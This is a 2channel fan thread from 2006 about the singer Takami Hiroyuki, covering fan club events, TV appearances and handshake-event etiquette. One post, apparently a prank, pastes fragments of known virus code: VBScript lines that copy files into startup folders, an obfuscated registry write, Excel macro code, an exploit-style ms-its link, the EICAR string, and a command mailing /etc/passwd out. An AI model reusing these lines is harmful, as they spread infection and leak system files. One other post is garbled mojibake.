2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【貴水博之(^-^)】

1 :NO MUSIC NO NAME:2006/09/19(火) 01:25:58 ID:ZZHehsic
貴水博之スレッドです。
sage進行推奨。
定期的な保守をお願いします。


▼前スレ
【10年間の軌跡】貴水博之【11年目の奇跡】
http://music5.2ch.net/test/read.cgi/musicjm/1130501090/

▼関連スレ
∞ access2006 Sync.47∞
http://music5.2ch.net/test/read.cgi/musicjg/1155902354/

2 :NO MUSIC NO NAME:2006/09/19(火) 04:21:30 ID:BfEUPhkJ
余裕の2ゲット(^-^)



なんか悲しいな…

3 :NO MUSIC NO NAME:2006/09/19(火) 06:51:17 ID:QdJc3Dsr
THE 3

4 :NO MUSIC NO NAME:2006/09/19(火) 07:07:55 ID:b1GOn4Iw
四ゲットじゃ

5 :NO MUSIC NO NAME:2006/09/19(火) 07:19:06 ID:URPWcSdM
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

6 :NO MUSIC NO NAME:2006/09/19(火) 09:01:50 ID:LgbbwggT
ほっしゅ

7 :NO MUSIC NO NAME:2006/09/19(火) 13:10:10 ID:07xnTsAZ
>>1

ラッキー7!

8 :NO MUSIC NO NAME:2006/09/19(火) 15:09:01 ID:W2CmLOlj
前スレでFCイベ申し込んだ公演行けないかもと書いた者ですが
さっき太陽にチケの譲渡について聞いたらヤル気ない声で
「出来ないんですよォー」だって(´・ω・`)
もうだめぽ(´・ω・`)

9 :NO MUSIC NO NAME:2006/09/19(火) 15:51:00 ID:lvRXVyu7
よし!それなら、FCに入ってない自分が
おまいさんになりすまして
代わりに行ってあげるぽよ(´・ω・`)

10 :NO MUSIC NO NAME:2006/09/19(火) 16:14:06 ID:W2CmLOlj
ダメ(´・ω・`)

いや本当に、譲渡可なら誰かに譲っても良かったんだけど
チケ申し込んだ本人でないと無理なんだとよ
(誤魔化せなくもなさそうな気がするけど冒険はやめておこう)
無駄になるチケなんだったらもう少し悪あがきしてやる
まだ当落不明だけど

11 :NO MUSIC NO NAME:2006/09/19(火) 16:34:22 ID:lvRXVyu7
ガンガレ(´・ω・`)

12 :NO MUSIC NO NAME:2006/09/19(火) 16:47:29 ID:BfEUPhkJ
新年会はFC入ってないシレの分をFC入ってるけど行かないシレの名前と会員証借りて申し込んだんだがな…
今回とはまたケースが違うか…

13 :NO MUSIC NO NAME:2006/09/19(火) 16:59:17 ID:07xnTsAZ
会員証さえ預けれれば別に顔確認ができる訳じゃなし 譲渡は可能の気もするが
身近なダチとかじゃないと会員証貸すのは嫌だよなやっぱり


14 :NO MUSIC NO NAME:2006/09/19(火) 18:02:53 ID:W2CmLOlj
>>13
そうそう。実はお互いに都合が合う人がいれば
チケと共に会員証を一時交換してもいいよなーとも思うんだけど
(東京申し込んで無理かも知れんので名古屋と替えられたら替えたい)
周りに選べるほど会員の知り合いいないしw

15 :NO MUSIC NO NAME:2006/09/19(火) 19:26:33 ID:JzuBjmHr
新スレ〜


16 :NO MUSIC NO NAME:2006/09/20(水) 00:16:37 ID:pqL+OI99
>14
そら建前上太陽はそう言うがな
入口はイベンダーの整理員だし会員証とチケの名前の照合もしなかったぞ
譲渡または交換で妖精サイトか奥に出して見たらいいと思うが
妖精サイトでも管理人がうるさいとこあるから気をつけて


17 :NO MUSIC NO NAME:2006/09/20(水) 02:50:02 ID:phQyXyIN
前スレ埋める前に落ちたよ…(^-^;)

18 :NO MUSIC NO NAME:2006/09/20(水) 09:31:42 ID:L5tJspRX
・・・ドンマイ!(^-^)

19 :NO MUSIC NO NAME:2006/09/20(水) 19:46:16 ID:Akcs7hcz
さっき日テレつけてたらカラオケ番組今日だっけ!?と思って大慌てした

20 :NO MUSIC NO NAME:2006/09/20(水) 20:40:52 ID:bYalD/U1
自分もだw
マチャミが出てるからかなり真剣にビビった

21 :NO MUSIC NO NAME:2006/09/22(金) 20:25:24 ID:hFnZs+Gu
▼過去ログ倉庫
http://www23.tok2.com/home/aohigesouko/

一応これも

22 :NO MUSIC NO NAME:2006/09/23(土) 21:45:37 ID:BuXvfKBk
!!!!!!!!!!!!!!!(^-^)!!!!!!!!!!!!!!!
http://news20.2ch.net/test/read.cgi/news/1158950592/

23 :NO MUSIC NO NAME:2006/09/24(日) 00:07:32 ID:mk2zoLn/
大人気じゃねーの

24 :NO MUSIC NO NAME:2006/09/24(日) 03:51:21 ID:tSuTwQgc
>22
大変笑わせていただいたw
これは貫き通してこそだ

25 :NO MUSIC NO NAME:2006/09/24(日) 10:18:49 ID:0j3Se9Zc
このまま流行ったら面白いけどインパクト薄いから無理だろうなw
+じゃない方のν即を見るのは初めてに近いけど
流行るにしてもバカニュースみたいに板内だけって感じだな

26 :NO MUSIC NO NAME:2006/09/26(火) 13:06:05 ID:1xtVqAFz
>>22
dat落ちしたようなのでログ倉庫にしまっておきましたw

27 :NO MUSIC NO NAME:2006/09/27(水) 16:29:40 ID:DoRteB6r
イベントチケはいつ頃届くかなぁ??

28 :NO MUSIC NO NAME:2006/09/27(水) 18:20:24 ID:y+t8ig25
>>27
イベント2週間前に発送予定

29 :NO MUSIC NO NAME:2006/09/27(水) 21:10:37 ID:DoRteB6r
29ありがとう。ぢゃもうすぐだね

30 :NO MUSIC NO NAME:2006/09/28(木) 14:30:18 ID:2h56/2b2
ホッシュ

31 :NO MUSIC NO NAME:2006/09/28(木) 15:26:52 ID:muOTK/Ix
明日ヒロタソ見てくるお

32 :NO MUSIC NO NAME:2006/09/28(木) 15:40:55 ID:wNnDfWB6
生放送なの?

33 :NO MUSIC NO NAME:2006/09/28(木) 18:05:22 ID:juk+/okc
>31
自分も初日行くつもりだったけど仕事入って行けん…
今回のムージカルは諦めたよorz
レポ頼んます

34 :NO MUSIC NO NAME:2006/09/29(金) 19:23:35 ID:8xJg0wtr
カラオケ歌うやつで久しぶりに見た。なんか落ちたな。

35 :NO MUSIC NO NAME:2006/09/29(金) 19:26:36 ID:ajdPwhMP
また出るかな

36 :NO MUSIC NO NAME:2006/09/29(金) 19:56:21 ID:dcFMsG+x
お肌の調子が悪いね。ってか直視できなくて声だけ聞いてた

37 :NO MUSIC NO NAME:2006/09/29(金) 20:08:43 ID:LocxYVFG
今日はω右寄りでつ

今20分休憩中…
そんなに無くていいよ…(´・ω・`)

38 :NO MUSIC NO NAME:2006/09/29(金) 21:18:08 ID:LocxYVFG
ジャック終わた…


39 :名無しさん@お腹いっぱい。:2006/09/29(金) 21:20:25 ID:HcKejn9Y
>38
漏れ明日行くんだがいかがでしたか

40 :NO MUSIC NO NAME:2006/09/29(金) 21:47:10 ID:9EfhlMXY
最後の20分くらいしか見れなかったんですが、
カラオケで歌ったor何か話題振りとかありましたか?

41 :NO MUSIC NO NAME:2006/09/30(土) 02:35:25 ID:AmS/p8Ki
>>40
バンプオブチキンの曲(知らん)で歌う事になるが分からず
出だしの「午前二時」を二回歌う
マチャミさんに「お前は時計か!」とツッコまれる

ラブソング歌って採点する対決にも出演
ヒロ、スピードワゴン井戸田、インパルス堤下、金子貴俊、香田晋の5人
ヒロと香田さんが同点優勝
特別喋ったりとかはしなかったと思う

42 :NO MUSIC NO NAME:2006/09/30(土) 03:31:23 ID:9CSQNgNv
>>40
http://youtube.com/watch?v=REqbh2b0eFA

43 :NO MUSIC NO NAME:2006/09/30(土) 07:09:43 ID:9D+5u63N
相変わらずキンキン声だったな
昔は顔に騙されてたけど
声が好みでないことに気づいて
曲が御大でなくなってから離れてしまった

44 :NO MUSIC NO NAME:2006/09/30(土) 09:28:55 ID:tHAmIE67
UKのミキサーが
貴水の声は,音に乗せやすく良いが
浅倉の音は,駄目だとさw
access聞かしたのが,間違いだった…

45 :NO MUSIC NO NAME:2006/09/30(土) 10:57:57 ID:9FkWagth
今も歌手なのにこういう番組出るなんて価値が下がると思うんだけど…。
プライドないのかな。

46 :NO MUSIC NO NAME:2006/09/30(土) 11:05:13 ID:HryMNvjN
死後と選んでる余裕がないんじゃなかろうか

47 :NO MUSIC NO NAME:2006/09/30(土) 11:34:27 ID:Ah8vdOGa
何に出ようがヒロの素晴らしさはかわらない…妖精でつww

48 :NO MUSIC NO NAME:2006/09/30(土) 12:57:18 ID:eO6t4okp
テレビでヒロが観れるだけでもしあわせ・・・
accessのプチ紹介もあったし。

49 :NO MUSIC NO NAME:2006/09/30(土) 13:33:46 ID:AmS/p8Ki
>>43
大人しく相方スレに帰れw

50 :NO MUSIC NO NAME:2006/09/30(土) 14:10:44 ID:+eTSrkx9
47と48に同意します。
妖精ですが、何か?

51 :NO MUSIC NO NAME:2006/09/30(土) 22:13:56 ID:9D+5u63N
>49
なんか哀れ・・・
事実だよ
相方は曲以外、興味ない
今は曲すらも興味なくなったけど

52 :NO MUSIC NO NAME:2006/09/30(土) 23:49:50 ID:ui6uCoTe
ミュージカルレポ こないね…

53 :NO MUSIC NO NAME:2006/10/01(日) 01:29:15 ID:GAmfxOY0
>>51
お前が興味あるかないかは誰も訊いてねーよw

54 :NO MUSIC NO NAME:2006/10/01(日) 01:38:49 ID:qDOWNPXW
>53
やれやれ、久々に厨房をみたよ
批判的な感想書くと相方ヲタ扱いするし
>43は自分の本心を書いたまでだよ
それが受け入れられないならスルーすれば?

55 :NO MUSIC NO NAME:2006/10/01(日) 02:08:44 ID:fy1PF8po
>>54
>やれやれ、久々に厨房をみたよ

ごめん、ちょっとワロタ

56 :NO MUSIC NO NAME:2006/10/01(日) 02:53:34 ID:GAmfxOY0
>>54
ヒロに批判的=相方ヲタ という考え方は持ってないよ
お前の最初のレスから相方ヲタなんだと判断した
決めつけてごめんね(^-^)!!!!!!!!!!

57 :NO MUSIC NO NAME:2006/10/01(日) 07:42:52 ID:yxqmO/vU
ヒロの声ってキンキン声なの?
高いけどキンキンしてないと思うよ


58 :NO MUSIC NO NAME:2006/10/01(日) 11:20:59 ID:qDOWNPXW
>57
そう思う人がいるってことです
超音波ボイスとよく言われてたでしょ

59 :NO MUSIC NO NAME:2006/10/01(日) 13:40:59 ID:exQmLbQe
「キソキソ声だよな」だけの書き込みならよくあるけど
ヲタ変遷の自分語りしかも相方ヲタと読み取れる内容だったから
カエレと言われても仕方ないと思われ

60 :NO MUSIC NO NAME:2006/10/02(月) 08:13:33 ID:fFKOvnMk
ヲタサイトじゃないんだしスルー汁
ジャクブレル良かったよ。2公演取って正解だった
シャンソンだし高音あまりないし歌詞がアレだったりするけど
後からじわじわ来る感じ。

61 :NO MUSIC NO NAME:2006/10/02(月) 09:01:29 ID:lmR9FJ7P
自分語りキモー

62 :NO MUSIC NO NAME:2006/10/02(月) 09:41:34 ID:qKMThc1q
ジャックブレル最高でした(〃▽〃)
高音少なかったけどいろんな表情のヒロが見れて自分は満足デス!

63 :NO MUSIC NO NAME:2006/10/03(火) 15:09:30 ID:fywEMyrD
542 名前:Track No.774[] 投稿日:2006/10/03(火) 15:02:36
ヒロのこと売れない言うけどさ...アクセスだってガンダム主題歌だったら売れると思うよ。


64 :NO MUSIC NO NAME:2006/10/03(火) 21:49:26 ID:g+M26cIN
コピペに文句つけるのもナンだが
灰汁とガンダムが合わな過ぎて売れんかもorz

65 :NO MUSIC NO NAME:2006/10/03(火) 21:56:10 ID:2WOtwpIT
ガンダムは引くな

66 :NO MUSIC NO NAME:2006/10/03(火) 23:40:45 ID:fz5P+fZa
ていうかもう灰汁もHIROも終わってるって

数々のチャンスを判断ミスで棒にふった
(灰汁解散しかり、ソロしかり)
いつも遊びと女優先
アドバイスや忠告はことごとく無視
売れなくなるのも無理ないって

若さだけが取り柄だったのに、それももうないしさ

67 :NO MUSIC NO NAME:2006/10/04(水) 00:38:17 ID:hWbcYJa/
反論デキネ(*´∀`)

まあピソハが100万に分裂すればミリオンなんかすぐ達成さ

68 :NO MUSIC NO NAME:2006/10/04(水) 00:57:21 ID:8s5JUpdG
たーちゃんに比べれば、もうなんでもありだろw

69 :NO MUSIC NO NAME:2006/10/04(水) 05:42:24 ID:yLsEEqdJ
芸能界に残れているのはスゴいよね



70 :NO MUSIC NO NAME:2006/10/05(木) 00:11:47 ID:993Vp0VD
今もし、灰汁がシングルを リリースするとしたらオリコンチャート12位〜18位ぐらいでランクインしてくる事は間違いないだろうな!!

71 :NO MUSIC NO NAME:2006/10/05(木) 00:43:15 ID:6pGhs5ah
檻鯖が2位だったし
出す時期が大物とかぶらなければ
ソコソコいけるんじゃ!!


…と思うのはヲタ目だからですかorz

72 :NO MUSIC NO NAME:2006/10/05(木) 01:51:11 ID:993Vp0VD
う〜ん(・ω・)掃除機、厳しいかも?まぁ売上だけが、アーティストの使命じゃないからね!でもレコード会社と契約してる以上そんな事も言ってられないのも事実。

73 :NO MUSIC NO NAME:2006/10/05(木) 02:00:42 ID:ZtXSYU7E
>70
TOP10入りはするんじゃない?
がしかし、1週で消えそ…

74 :NO MUSIC NO NAME:2006/10/05(木) 02:08:38 ID:t2xCP7ht
20位以内に入ればホメてあげてもいいかな?ぐらいだろ
いくらCD自体が売れていないとは言え灰汁ヲタは着実に減ってるぞ
初回特典10種類ぐらいはしないとまずいんじゃないかw

75 :NO MUSIC NO NAME:2006/10/05(木) 02:12:59 ID:993Vp0VD
蜈・繧九°繧ゅュシ溘〒繧らー豎√′90蟷エ莉」縺ョ髻ウ讌ススシスーセ昴r蠖ゥ縺」縺ヲ縺縺溘ョ縺ッ莠句ョ滂シシ∽ス輔〒繧ゑセスイセ撰セ晢スクセ槭′縲∝、ァ莠九□縺ィ諤昴≧縺ョ縺縺鯉シ

76 :NO MUSIC NO NAME:2006/10/05(木) 02:20:19 ID:ZtXSYU7E
>74
特典10種…ww

自分の周り、灰汁好きになってきてる奴が増えてるぞ

77 :NO MUSIC NO NAME:2006/10/05(木) 02:20:45 ID:993Vp0VD
↑何でこうなるの〜♪ w何でもタイミングが、大事かもね!!

78 :NO MUSIC NO NAME:2006/10/05(木) 02:42:51 ID:t2xCP7ht
>>76
そりゃお前の周りだけだw
ツアーが全国3箇所しかない上に大阪名古屋のチケは余らせるし
とにかく02年03年の売り上げを下回るのはまず確実
となると20位に届くかどうか
H"はトレカ9種、リッピンもジャケ写が6〜7種あっての売り上げだったんだから

79 :名無しさん@お腹いっぱい。:2006/10/05(木) 12:20:09 ID:9zVCWf9v
折鯖の時はベルファーレでの復活イベント参加抽選券が入ってたしなー

80 :NO MUSIC NO NAME:2006/10/05(木) 17:39:43 ID:897DIVFS
みんなはFCイベは参戦するのか?
渋谷の収容人数わかる人いたら教えてくれぇorz

81 :NO MUSIC NO NAME:2006/10/05(木) 17:47:06 ID:GQFnWsC4
ファンクラブイベ名古屋との交換希望様
仕事で東京に振り替えたいので
捨てアド晒すんでよろしくです

iiyukii_ii@ヤフ

82 :NO MUSIC NO NAME:2006/10/05(木) 18:39:02 ID:cSEfQ3oY
あたし、この間のカラオケのやつ見てヒロのファンになったょ!!
今accessのCD聴いてるけどいい曲ばっかりだね!!

83 :NO MUSIC NO NAME:2006/10/05(木) 18:42:31 ID:cSEfQ3oY
あげちゃった…
ごめんなさい…

84 :NO MUSIC NO NAME:2006/10/05(木) 20:43:18 ID:ZtXSYU7E
あーゆうカラオケ番組に出るなって言う奴もいるけど、それを見ていろんな人が興味持ってくれたり、ソロや灰汁の活動が今よりも少しでもやりやすくなったらいいな…って思う

85 :NO MUSIC NO NAME:2006/10/05(木) 23:12:52 ID:CUlnzzpB
FCハガキって関西地区も到着済み?
自分wktkして待ってるけどマダ‥

86 :NO MUSIC NO NAME:2006/10/06(金) 01:52:15 ID:yk4y596f
>82
なんて分かりやすい自演なんだろ

87 :NO MUSIC NO NAME:2006/10/06(金) 07:34:13 ID:jSJiYlnS
誰の自演?
もしかしたらほんとのただの新規ファンかもしれないし歓迎しとこうや

88 :NO MUSIC NO NAME:2006/10/06(金) 11:57:21 ID:Uj5AImug
渋谷は4日に発送してるから大阪は10日くらいじゃないか?

89 :NO MUSIC NO NAME:2006/10/06(金) 14:49:42 ID:vXTiUp2/
関西キター
でも糞番‥

90 :NO MUSIC NO NAME:2006/10/06(金) 14:52:53 ID:THMZfoU4
>89
東京チケが関西にきたってこと?

91 :NO MUSIC NO NAME:2006/10/06(金) 17:34:38 ID:vXTiUp2/
東京イベの分関西に到着しますた!
何番台まであるんだろ

92 :NO MUSIC NO NAME:2006/10/06(金) 18:05:55 ID:Uj5AImug
応募者全員参加できるだけに何番まであるか気になる(>_<)
因みに私は東京400番台…。

93 :NO MUSIC NO NAME:2006/10/06(金) 18:32:37 ID:vXTiUp2/
1000番近くある模様‥
私は200後半

94 :NO MUSIC NO NAME:2006/10/06(金) 19:16:30 ID:ABtl6uNn
イスもどれくらいあるのか不安だよ。
700番台の自分は半分諦めモード… orz

95 :NO MUSIC NO NAME:2006/10/06(金) 19:45:06 ID:+yMwRJTU
行けるだけいいジャマイカ…

96 :NO MUSIC NO NAME:2006/10/06(金) 19:46:45 ID:Uj5AImug
SHIBUYA-AXは狭いの?

97 :NO MUSIC NO NAME:2006/10/06(金) 20:09:14 ID:NngXbRyj
SHIBUYA-AX
オールスタンディング:約1500人収容
座席有りの場合:約700人収容
今は亡き赤坂BRITZと同じくらいらしい

98 :NO MUSIC NO NAME:2006/10/06(金) 20:16:50 ID:vXTiUp2/
座るのは無理ぽ(゚Д。)
ギュウギュウならないといいが‥

99 :NO MUSIC NO NAME:2006/10/06(金) 20:41:07 ID:Uj5AImug
前に700席あって後ろ300人くらいが立見なのか?


100 :NO MUSIC NO NAME:2006/10/06(金) 21:09:30 ID:NngXbRyj
携帯からだと検索も面倒臭いなw
携帯画面で小さいシートマップを見て数えたので不確かだが
2階の固定座席が140くらいあるっぽい、1階はシートスタイルの場合600くらい?
1階はそれを減らして立見スペースを作って900人ほど入れる事になるのかな

既に人数は確定してるだろうから問い合わせた方が早いかもなw

101 :NO MUSIC NO NAME:2006/10/08(日) 04:45:58 ID:q/DfmyRQ
貴水博之は最強最高!

102 :NO MUSIC NO NAME:2006/10/09(月) 02:19:22 ID:IolUfO86
貴水博之は、ユーロやテクノみたいな、アップテンポな曲が似合いすぎ(^ε^)♪


103 :NO MUSIC NO NAME:2006/10/09(月) 05:10:23 ID:IolUfO86
貴水氏、格好よくなったな

104 :NO MUSIC NO NAME:2006/10/09(月) 11:52:59 ID:ZYzEyPxM
昔から取り柄は顔と下半身だけですが何か

105 :NO MUSIC NO NAME:2006/10/09(月) 17:24:13 ID:ubragcXB
>104
声も含めてやってくれよ…

106 :NO MUSIC NO NAME:2006/10/09(月) 18:03:46 ID:BEntdxD/
ヘタレでちょっとダメ男な性格も、かなり好きだよ

107 :NO MUSIC NO NAME:2006/10/09(月) 18:23:38 ID:lZ8rejKQ
だめんずウォーカー?

108 :NO MUSIC NO NAME:2006/10/10(火) 21:34:04 ID:bDT/Xgyt
過疎スギww

109 :NO MUSIC NO NAME:2006/10/12(木) 07:41:24 ID:2LPJolgt
EDGE好き

こないだようつべでMステのスキャンダラスブルー見ました

保守

110 :NO MUSIC NO NAME:2006/10/12(木) 19:25:50 ID:mu262NeS
あたしもようつべ見ました!Mステのスキャンダラスブルーはヒロも大ちゃんもとても楽しそうで和みますよね。

111 :NO MUSIC NO NAME:2006/10/12(木) 23:27:48 ID:2ZDvYtms
(((( ;゚Д゚))))ガクガクブルブル

112 :NO MUSIC NO NAME:2006/10/13(金) 00:03:23 ID:q/17YmYQ
モチツケ
ここは邦楽だから

113 :NO MUSIC NO NAME:2006/10/13(金) 13:19:06 ID:CuDkQyNM
今何やってるのヒロタソは…(ρ_;)

114 :NO MUSIC NO NAME:2006/10/15(日) 09:22:20 ID:eZR+NOU+
貴水氏は人として優し過ぎそう

西川は腹黒そう


115 :NO MUSIC NO NAME:2006/10/15(日) 13:12:27 ID:5G7wgJDr
(゚Д゚;=;゚Д゚)

116 :NO MUSIC NO NAME:2006/10/15(日) 13:33:49 ID:aEGQCOXt
きんも〜★

117 :NO MUSIC NO NAME:2006/10/15(日) 16:26:58 ID:FZPFF3k6
イベント…椅子欲しいんだけど。

118 :連投スマン:2006/10/15(日) 16:37:47 ID:FZPFF3k6
ネイキッドと黄金振動PV流れてるw

119 :NO MUSIC NO NAME:2006/10/15(日) 21:39:26 ID:aEGQCOXt
今日のセットリストkwsk

120 :NO MUSIC NO NAME:2006/10/16(月) 08:30:43 ID:poOwX6Em
とりあえず超女神は覚えておいたほうがいいかも。
ふられるぞw

121 :NO MUSIC NO NAME:2006/10/16(月) 19:03:58 ID:KtfVAylf
椅子が癌
椅子が無ければ後ろはもっと普通に見れただろうに

122 :NO MUSIC NO NAME:2006/10/18(水) 02:07:33 ID:P3GkgHgF

旦 >コトッ

ホシュ

123 :NO MUSIC NO NAME:2006/10/19(木) 14:48:50 ID:cxuJmBbY
121
言える!ジャンケン大会の時特に辛かった。
詰めれば良いってもんじゃないよね。倒れてた人いたし。
太ったファンが多くてただでさえ見辛いのに。
せっかく握手できたのに何で皆もっとお洒落しないんだ!?

124 :NO MUSIC NO NAME:2006/10/19(木) 15:52:50 ID:0Z2L7uUp
>>123
二階は比較的マトモな感じだったよ。
小さい男の子がお母さんと来ててびっくりしたけど。

125 :NO MUSIC NO NAME:2006/10/19(木) 21:25:30 ID:9VqHXQ9Z
>>123
ヒロファンって、そんな感じなんだ…

126 :NO MUSIC NO NAME:2006/10/19(木) 21:41:26 ID:9HaPCeSQ
握手あんのにそれなりにお洒落してこないなんてどんな考えしてんのか意味分からん(-д-;)灰汁やヒロヲタって特殊だよね
握手あるなら普通お洒落してきそうなのに…

127 :名無しさん@お腹いっぱい。:2006/10/19(木) 22:36:45 ID:A7TvJ8cE
アレがココ一番のオサレなんだってばww
彼女らは彼女らなりに精一杯ww

128 :NO MUSIC NO NAME:2006/10/19(木) 22:40:21 ID:ooHHNMVP
握手するからちょっとスキンケアとか服とか気合入れちゃって自分必死だな
とか思ってたけどそれが普通だよなwよかったw

129 :NO MUSIC NO NAME:2006/10/19(木) 23:03:12 ID:9VqHXQ9Z
自分なんか、来年にあるであろう灰汁のライブの為に、今から必死になってるのにww
こんな自分、イタイコですか

130 :NO MUSIC NO NAME:2006/10/19(木) 23:27:53 ID:9HaPCeSQ
だよね!
普通の一般感覚ならライブやしかも握手するなんて事になったら髪型、化粧、服装トータルこだわりまくりだってーのww
その辺ヒロヲタとかは一般とはかけ離れた感覚と昔から思う

131 :NO MUSIC NO NAME:2006/10/19(木) 23:48:17 ID:Ds8E0iX3
披露宴に出席するようなパーティドレスはありですか?

132 :NO MUSIC NO NAME:2006/10/19(木) 23:50:00 ID:Ds8E0iX3
>131
sage忘れです。。

133 :NO MUSIC NO NAME:2006/10/20(金) 00:03:37 ID:9VqHXQ9Z
>>131
ぃや…それはどうかとww

134 :NO MUSIC NO NAME:2006/10/20(金) 01:57:29 ID:qxAaABeT
自分は一ヶ月前からスキンケアなど頑張って当日メタメタオサレしたであります(´Д`)


135 :NO MUSIC NO NAME:2006/10/20(金) 10:41:56 ID:uRBbc9Hl
それが普通だよ!!
普段着みたいので行ける人の気持ちがわからん…

136 :NO MUSIC NO NAME:2006/10/20(金) 10:55:30 ID:5r1FgwXh
でもヒロに会うからスキンケア、じゃなく普段から心がけてるべきでは…
ヒロのために、ヒロのために、じゃなく自分のためですよ

137 :NO MUSIC NO NAME:2006/10/20(金) 12:10:31 ID:uRBbc9Hl
最もな意見、ありがとうww

138 :NO MUSIC NO NAME:2006/10/20(金) 13:03:17 ID:0N2cd8t+
スキンケアはヒロがどうの関係なく当たり前な話では…

139 :128:2006/10/20(金) 17:53:06 ID:mUrxRgem
別に今回だけスキンケアしてそれっきりとかいう訳ではないだろう
普段からしている事を、いつもより気合入れてしてみたりさ

いつもクレンジングオイルでマッサージして角栓取ってるんだけど
イベントが迫るにつれてマッサージの時間が延びて行ったよw
眉毛整えるのもえらく慎重になったりして、自分はまだまだ妖精だなと思った

140 :NO MUSIC NO NAME:2006/10/20(金) 19:04:46 ID:CQhfF5oq
でもライブで、汗かきまくった後に
握手っていうのもキツかったな。

141 :NO MUSIC NO NAME:2006/10/20(金) 23:12:24 ID:uRBbc9Hl
ヒロの手って、どんな感じ?

142 :NO MUSIC NO NAME:2006/10/21(土) 00:15:31 ID:P+ECbvYR
昔はふにゃふにゃで柔らかかったけど、今は男らしく硬かったよーな。

143 :NO MUSIC NO NAME:2006/10/21(土) 00:49:56 ID:I2CUMZ5q
腕は柔らかかったじょ(*´▽`*)

144 :NO MUSIC NO NAME:2006/10/21(土) 00:58:40 ID:R7XvJ05/
お触りしたい…
まだFCに入ったばかりの為、イベには行けないんだよ
妄想します…ww

145 :NO MUSIC NO NAME:2006/10/21(土) 01:14:31 ID:wOY7SkaJ
今まで何度か握手会というものを経験したけど(ヒロ以外もアリ)
どうしても緊張で感触とか細かい事覚えてないんだよなー
でも今回は珍しく気が抜けてなかったwしっかり目見てくれた
それが想定外だったんで何だか恥ずかしかった…

146 :NO MUSIC NO NAME:2006/10/21(土) 01:20:37 ID:zHhRbXZg
みんなヒロに声掛けたりした?
大体どんな事話す?

147 :NO MUSIC NO NAME:2006/10/21(土) 01:41:36 ID:I2CUMZ5q
漏れは嬉しすぎて泣きながら『ありがとうございました(ノ_・。)』と言った… 。
あのヒロの目は反則だぁ(>_<) 気をつけないと死ぬ( ̄▽ ̄;)

148 :NO MUSIC NO NAME:2006/10/21(土) 02:28:24 ID:dqcD8TXF
>>139
クレンジングオイル使い続けるとキメが無くなるよ。
特にD○Cは。
FROM美容部員

149 :NO MUSIC NO NAME:2006/10/21(土) 06:32:54 ID:R7XvJ05/
>148
えぇっ!!!!
じゃあ、何で落とせばいいの?

150 :NO MUSIC NO NAME:2006/10/21(土) 07:07:06 ID:QBAsIdz6
>>149
美容部員ではないが、
ポイントメイクは専用のリムーバーで落とし、全体はクレンジングクリームかミルクで落とす。
クリームとミルク、どちらが良いのかまでは覚えてない('∀`)
美容部員さん、フォロー宜しくというか、2ちゃんねるにアクセス出来るのだから、
化粧板や美容板なども覗いてみてはいかがでしょうか(´・ω・`)

151 :NO MUSIC NO NAME:2006/10/21(土) 07:07:56 ID:Kp6OyBnS
なにゆえ?

152 :NO MUSIC NO NAME:2006/10/21(土) 12:33:10 ID:wOY7SkaJ
>>150
ニュー速+くらいしか行かないんだよなあ
女が多い板はどうも受け付けなくて…
インターネッツだったら2chでなくてもいいよね

DHCが糞っていうのは一般的にも割と有名だねw
2chとも一騒動あったし

153 :NO MUSIC NO NAME:2006/10/21(土) 21:57:12 ID:KDvjUFMf
ヒロもファンが自分に会う為にお洒落してくれた方が絶対嬉しいだろうし
そうしないとヒロに失礼ってものだよね!
だってヒロも握手の時ばっちり格好良くキメてくれてたじゃない!?
あの笑顔は忘れられない・・・キラキラしてたよ!

154 :NO MUSIC NO NAME:2006/10/21(土) 23:08:51 ID:P+ECbvYR
飾りすぎないお洒落と、押し付けがましくないストレートな
感情表現あたりが喜んでもらえると思うよ。握手の時。
ヒロ自体がストレートな人だと思うから。
あと香水は軽いものか、遠慮した方がいいかも。

155 :NO MUSIC NO NAME:2006/10/22(日) 00:35:51 ID:X9dGczBb
ライブに香水は正直やめて欲しい

156 :NO MUSIC NO NAME:2006/10/22(日) 01:13:50 ID:AG7cZx9k
そんな香水臭い奴いた?

157 :NO MUSIC NO NAME:2006/10/22(日) 01:16:56 ID:fat0e0KA
香水ってのは映画とか舞台とか、屋内で決まった位置に座ったまま…みたいな場ではNGなんだよね
歩いていてすれ違う時に香る、みたいなのが好ましいとか(自分は香水使わないんでよく知らんが)
ライブで汗かくから匂いに気を遣うのは分かるけど、匂いつけるより消す方を気にするべきだろうね

158 :NO MUSIC NO NAME:2006/10/22(日) 18:16:57 ID:ilogt/fY


159 :NO MUSIC NO NAME:2006/10/23(月) 08:58:14 ID:+LPq8MCf
妄想妖精だらけになってきたな

160 :NO MUSIC NO NAME:2006/10/23(月) 09:12:26 ID:yujY5XVo
別によくね?

161 :NO MUSIC NO NAME:2006/10/23(月) 15:56:21 ID:skhqtmKj
今回のイベはソロでは一番よかったと思わない?
